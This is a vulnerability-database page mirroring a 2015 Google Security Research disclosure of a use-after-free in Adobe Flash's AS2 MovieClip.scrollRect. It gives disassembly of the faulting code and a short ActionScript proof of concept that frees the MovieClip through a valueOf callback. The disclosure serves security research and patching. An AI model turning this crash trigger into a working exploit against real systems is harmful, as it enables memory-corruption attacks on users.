Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free

🗓️ 19 Aug 2015 00:00:00Reported by Google Security ResearchType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

Adobe Flash AS2 MovieClip.scrollRect Use-After-Free vulnerability in Chrome 42.0.2311.9

Code
Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]

---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains 
in the stack

VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]

REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.

These lines come from flashplayer standalone 17.0.0.169:

.text:00597F45 loc_597F45:
.text:00597F45                 cmp     eax, 6
.text:00597F48                 jnz     loc_597FE5
.text:00597F4E                 mov     ecx, esi           ; esi points to the MovieClip object
.text:00597F50                 call    sub_40C1ED
.text:00597F55                 add     eax, 30Ch
.text:00597F5A                 or      dword ptr [eax], 8
.text:00597F5D                 mov     eax, [ebx]
.text:00597F5F                 mov     byte ptr [eax+82Ch], 1
.text:00597F66                 mov     ecx, [ebx]
.text:00597F68                 lea     eax, [ebp+74h+var_1C0]
.text:00597F6E                 push    eax
.text:00597F6F                 push    dword ptr [ebx+0Ch]
.text:00597F72                 call    xfetchRectangleProperties  ; get the Rectangle properties, and execute some AS2
.text:00597F77                 test    al, al
.text:00597F79                 jz      loc_598274
.text:00597F7F                 mov     edi, [ebp+74h+var_1C0]
.text:00597F85                 mov     ecx, esi
.text:00597F87                 imul    edi, 14h
.text:00597F8A                 call    sub_40C1ED          ; reference freed memory and return a bad 

pointer
.text:00597F8F                 mov     [eax+310h], edi     ; crash here, eax = 0



Poc (compile with Flash CS5.5):

import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
	_global.mc.createTextField("newtf",1,1,1,2,3)
	return 7
}
var o = {x:o2,y:0,width:4,height:5}

_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4
adobe flashas2movieclipscrollrectuse-after-freechrome 42.0.2311.90flash 17.0.0.169rectanglecrashproof of concept
23